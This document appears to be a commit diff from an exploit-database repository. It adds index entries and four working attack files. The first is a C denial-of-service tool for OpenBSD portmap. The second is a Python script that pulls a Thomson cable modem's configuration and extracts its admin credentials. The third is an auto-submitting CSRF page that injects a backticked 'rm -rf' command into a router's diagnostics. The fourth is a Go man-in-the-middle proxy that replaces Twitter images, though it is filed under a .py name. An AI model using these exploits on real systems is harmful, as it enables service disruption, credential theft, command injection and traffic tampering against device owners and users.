SLAE-R
diff --git a/‎files.csv‎
Lines changed: 16 additions & 0 deletions b/‎files.csv‎
Lines changed: 16 additions & 0 deletions
diff --git a/‎platforms/bsd/dos/38059.c‎
Lines changed: 80 additions & 0 deletions b/‎platforms/bsd/dos/38059.c‎
Lines changed: 80 additions & 0 deletions
diff --git a/‎platforms/hardware/webapps/38067.py‎
Lines changed: 112 additions & 0 deletions b/‎platforms/hardware/webapps/38067.py‎
Lines changed: 112 additions & 0 deletions
diff --git a/‎platforms/hardware/webapps/38073.html‎
Lines changed: 48 additions & 0 deletions b/‎platforms/hardware/webapps/38073.html‎
Lines changed: 48 additions & 0 deletions
diff --git a/‎platforms/ios/remote/38058.py‎
Lines changed: 115 additions & 0 deletions b/‎platforms/ios/remote/38058.py‎
Lines changed: 115 additions & 0 deletions
@@ -34083,6 +34083,7 @@ id,file,description,date,author,platform,type,port
 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
 37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0
+37948,platforms/php/webapps/37948.txt,"Wordpress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0
 37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass Vulnerability",2012-10-17,"Bernhard Mueller",linux,remote,0
 37950,platforms/php/webapps/37950.txt,"jCore /admin/index.php path Parameter XSS",2012-10-17,"High-Tech Bridge",php,webapps,0
 37951,platforms/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
@@ -34163,6 +34164,8 @@ id,file,description,date,author,platform,type,port
 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x 'uname()' System Call Local Information Disclosure Vulnerability",2012-10-09,"Brad Spengler",linux,local,0
 37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0
 37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
+38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting Vulnerability",2012-11-29,"Aditya Balapure",php,webapps,0
+38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,"Glaysson dos Santos",hardware,webapps,80
 37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
 37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
@@ -34367,3 +34370,16 @@ id,file,description,date,author,platform,type,port
 38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC",2015-09-01,KoreLogic,windows,dos,0
 38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC",2015-09-01,KoreLogic,windows,dos,0
 38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80
+38057,platforms/php/webapps/38057.txt,"WordPress Magazine Basic Theme 'id' Parameter SQL Injection Vulnerability",2012-11-22,"Novin hack",php,webapps,0
+38058,platforms/ios/remote/38058.py,"Twitter for iPhone Man in the Middle Security Vulnerability",2012-11-23,"Carlos Reventlov",ios,remote,0
+38059,platforms/bsd/dos/38059.c,"OpenBSD 4.x Portmap Remote Denial of Service Vulnerability",2012-11-22,auto236751,bsd,dos,0
+38060,platforms/php/webapps/38060.txt,"WordPress Ads Box Plugin 'count' Parameter SQL Injection Vulnerability",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0
+38061,platforms/php/webapps/38061.txt,"Beat Websites 'id' Parameter SQL Injection Vulnerability",2012-11-24,Metropolis,php,webapps,0
+38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT 'a' Parameter Open Redirection Vulnerability",2012-11-26,"Joseph Sheridan",multiple,webapps,0
+38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Vulnerability",2012-11-26,Amirh03in,php,webapps,0
+38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection Vulnerability",2012-11-27,Amirh03in,php,webapps,0
+38065,platforms/osx/shellcode/38065.txt,"OS X x64 /bin/sh Shellcode_ NULL Byte Free_ 34 bytes",2015-09-02,"Fitzl Csaba",osx,shellcode,0
+38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
+38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
+38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
+38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,zedsec390,system_z,shellcode,0
@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/56671/info
+
+OpenBSD is prone to a remote denial-of-service vulnerability.
+
+Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions.
+
+OpenBSD versions prior to 5.2 are vulnerable. 
+
+/*
+ * authors: 22733db72ab3ed94b5f8a1ffcde850251fe6f466
+ *          6e2d3d47576f746e9e65cb4d7f3aaa1519971189
+ *          c8e74ebd8392fda4788179f9a02bb49337638e7b
+ * 
+ *  greetz: 43c86fd24bd63b100891ec4b861665e97230d6cf
+ *          e4c0f3f28cf322779375b71f1c14d6f8308f789d
+ *          691cb088c45ec9e31823ca7ab0da8b4cf8079baf
+ *          b234a149e7ef00abc0f2ec7e6cf535ef4872eabc
+ *
+ *
+ * -bash-4.2$ uname -a
+ * OpenBSD obsd.my.domain 5.1 GENERIC#160 i386
+ * -bash-4.2$ id
+ * uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
+ * -bash-4.2$ netstat -an -f inet | grep 111
+ * tcp          0      0  127.0.0.1.111          *.*                    LISTEN
+ * tcp          0      0  *.111                  *.*                    LISTEN
+ * udp          0      0  127.0.0.1.111          *.*
+ * udp          0      0  *.111                  *.*
+ * -bash-4.2$ gcc openbsd_libc_portmap.c
+ * -bash-4.2$ ./a.out
+ * [+] This code doesn't deserve 1337 status output.
+ * [+] Trying to crash portmap on 127.0.0.1:111
+ * [+] 127.0.0.1:111 is now down.
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+#define HOST "127.0.0.1"
+#define PORT 111
+#define LOOP 0x100
+
+
+int main(void)
+{
+    int s, i;
+    struct sockaddr_in saddr;
+
+    printf("[+] This code doesn't deserve 1337 status output.\n");
+    printf("[+] Trying to crash portmap on %s:%d\n", HOST, PORT);
+
+    saddr.sin_family = AF_INET;
+    saddr.sin_port = htons(PORT);
+    saddr.sin_addr.s_addr = inet_addr(HOST);
+
+    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1) {
+        printf("[-] %s:%d is already down.\n", HOST, PORT);
+        return EXIT_FAILURE;
+    }
+
+    /* # of iteration needed varies but starts working for > 0x30  */
+    for(i=0; i < LOOP; ++i) {
+        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+        connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in));
+        send(s, "8========@", 10, 0);
+    }
+
+    if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1)
+        printf("[+] %s:%d is now down.\n", HOST, PORT);
+    else
+        printf("[-] %s:%d is still listening. Try to increase loop iterations...\n");
+
+    return EXIT_SUCCESS;
+}
@@ -0,0 +1,112 @@
+###############################################################################
+#+-////////////////////////////////////////////////////////////////////////////
+#+-
+#+- Exploit Title: Thomson Wireless VoIP Cable Modem Arbitrary File Access 
+#+- Date: October 22, 2013
+#+- Author: Glaysson dos Santos
+#+-
+#+- Product: TWG850-4B Wireless VoIP Cable Modem
+#+- Software Version: ST9C.05.08
+#+- Hardware Version: 2.1
+#+- BOOT Revision: 2.1.7i
+#+- Standard Specification Compliant: DOCSIS 2.0
+#+- Firmware Name: DWG850-4-9C.05.08-110217-S-1FF.bin
+#+- Firmware Build Time	19:19:19 Thu Feb 17 2011
+#+- Severity: High
+#+-
+#+-\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
+################################################################################
+
+
+import string
+import urllib2
+import sys
+from time import sleep
+import base64
+import binascii
+import os
+
+save  = 'log_TWG8504B.txt'
+log   = open(save,'w')
+bifi  = 'GatewaySettings.bin'
+refi  = 'RgComputers.asp'
+R_C   = ("\033[0;31m")
+G_C   = ("\033[1;32m")
+D_C   = ("\033[0m"   )
+
+
+def banner():
+	os.system('clear')
+	print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \
+       		\t- 2013 - Glaysson dos Santos (0cn1)\n\n"
+
+
+def hr_data(filename, min=4):
+	with open(filename, "rb") as f:
+        	result = ""
+        	for c in f.read():
+            		if c in string.printable:
+                		result += c
+                		continue
+            		if len(result) >= min:
+                		yield result
+				print >> log, result
+            		result = ""
+		print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save)
+
+def checkcreds(router,username,password):
+	auth_handler = urllib2.HTTPBasicAuthHandler()
+	auth_handler.add_password(realm='Thomson',
+                          uri	= router,
+                          user 	= username,
+                          passwd= password)
+	opener = urllib2.build_opener(auth_handler)
+	try:
+        	urllib2.install_opener(opener)
+        	status = urllib2.urlopen('%s/%s'%(router,refi))
+        	print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C)
+
+	except urllib2.URLError, e:
+    		if e.code == 401:
+        		print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C)
+
+def checkvuln(router):
+	try:
+		print '(+)- Checking if target is vulnerable...'
+		req = urllib2.Request('%s/%s'%(router,bifi))
+		response = urllib2.urlopen(req)
+		page = response.read()
+		x = open(bifi,'wb')
+		x.write(page)
+		x.close()
+		sleep(1)
+		print '(+)- The target appears to be vulnerable, lets check it better!'
+		print '(+)- Searching Credentials...'
+		sleep(1)
+		for s in hr_data(bifi):
+			try:
+				dec = base64.decodestring(s)
+				if dec.find(':') != -1:
+					user,passwd = dec.split(':')
+					print '(+)- User: %s%s%s'%(G_C,user,D_C)
+					print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
+					
+					print '(+)- Checking if creds are OK...'
+					checkcreds(router,user,passwd)
+					
+			except(binascii.Error):
+				pass
+	except urllib2.URLError, e:
+		print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C)
+		sys.exit(1)
+
+if __name__ == "__main__":
+	banner()
+        if len(sys.argv) != 2:
+                print '[!] %sRun %s router IP%s\n'%(R_C,sys.argv[0],D_C)
+                sys.exit(2)
+	
+        router = sys.argv[1]
+        if not "http" in router:
+                        router = "http://"+(sys.argv[1])
+        checkvuln(router)
@@ -0,0 +1,48 @@
+<!--
+######################################################################
+# Exploit Title: GPON Home CSRF With Command ExecuteVulnerability
+# Author: Phan Thanh Duy (logicaway) - KAISAI12 (ceh.vn)
+# E-mail:(facebook https://www.facebook.com/duy.phanthanh.75),(
+https://www.facebook.com/kai.sai.35)
+# Category: Hardware
+# Google Dork: N/A
+# Vendor: FTP Viet Nam
+# Firmware Version: 3.0.0 Build 120531
+# Product: FTP G-93RG1
+#
+#
+# Tested on: Windows 8 64-bit
+######################################################################
+
+#Introduction
+==============
+
+#Description of Vulnerability
+=============================
+Execute command with CSRF
+
+#Exploit
+========
+-->
+
+<html>
+<head>
+<title>CSRF Demo Exploit</title>
+</head>
+<body>
+
+<form name="auto" method="POST"
+action="http://192.168.1.1/GponForm/diag_XForm"
+enctype="multipart/form-data">
+<input type="hidden" name="XWebPageName" value="diag"/>
+<input type="hidden" name="diag_action" value="ping"/>
+<input type="hidden" name="wan_conlist" value="0"/>
+<input type="hidden" name="dest_host" value="`rm -rf stuff`"/>
+<input type="hidden" name="ipver" value="0"/>
+<!-- input type="submit" name="submit"/> -->
+</form>
+<script type="text/javascript">
+      document.auto.submit();
+</script>
+</body>
+</html>
@@ -0,0 +1,115 @@
+source: http://www.securityfocus.com/bid/56665/info
+
+Twitter for iPhone is prone to a security vulnerability that lets attackers to perform a man-in-the-middle attack.
+
+Attackers can exploit this issue to capture and modify pictures that the user sees in the application.
+
+Twitter for iPhone 5.0 is vulnerable; other versions may also be affected. 
+
+/*
+  Twitter App, eavesdroping PoC
+
+  Written by Carlos Reventlov <carlos@reventlov.com>
+  License MIT
+*/
+
+package main
+
+import (
+  "fmt"
+  "github.com/xiam/hyperfox/proxy"
+  "github.com/xiam/hyperfox/tools/logger"
+  "io"
+  "log"
+  "os"
+  "path"
+  "strconv"
+  "strings"
+)
+
+const imageFile = "spoof.jpg"
+
+func init() {
+  _, err := os.Stat(imageFile)
+  if err != nil {
+    panic(err.Error())
+  }
+}
+
+func replaceAvatar(pr *proxy.ProxyRequest) error {
+  stat, _ := os.Stat(imageFile)
+  image, _ := os.Open(imageFile)
+
+  host := pr.Response.Request.Host
+
+  if strings.HasSuffix(host, "twimg.com") == true {
+
+    if pr.Response.ContentLength != 0 {
+
+      file := "saved" + proxy.PS + pr.FileName
+
+      var ext string
+
+      contentType := pr.Response.Header.Get("Content-Type")
+
+      switch contentType {
+      case "image/jpeg":
+        ext = ".jpg"
+      case "image/gif":
+        ext = ".gif"
+      case "image/png":
+        ext = ".png"
+      case "image/tiff":
+        ext = ".tiff"
+      }
+
+      if ext != "" {
+        fmt.Printf("** Saving image.\n")
+
+        os.MkdirAll(path.Dir(file), os.ModeDir|os.FileMode(0755))
+
+        fp, _ := os.Create(file)
+
+        if fp == nil {
+          fmt.Errorf(fmt.Sprintf("Could not open file %s for writing.", file))
+        }
+
+        io.Copy(fp, pr.Response.Body)
+
+        fp.Close()
+
+        pr.Response.Body.Close()
+      }
+
+    }
+
+    fmt.Printf("** Sending bogus image.\n")
+
+    pr.Response.ContentLength = stat.Size()
+    pr.Response.Header.Set("Content-Type", "image/jpeg")
+    pr.Response.Header.Set("Content-Length",
+strconv.Itoa(int(pr.Response.ContentLength)))
+    pr.Response.Body = image
+  }
+
+  return nil
+}
+
+func main() {
+
+  p := proxy.New()
+
+  p.AddDirector(logger.Client(os.Stdout))
+
+  p.AddInterceptor(replaceAvatar)
+
+  p.AddLogger(logger.Server(os.Stdout))
+
+  var err error
+
+  err = p.Start()
+
+  if err != nil {
+    log.Printf(fmt.Sprintf("Failed to bind: %s.\n", err.Error()))
+  }
+}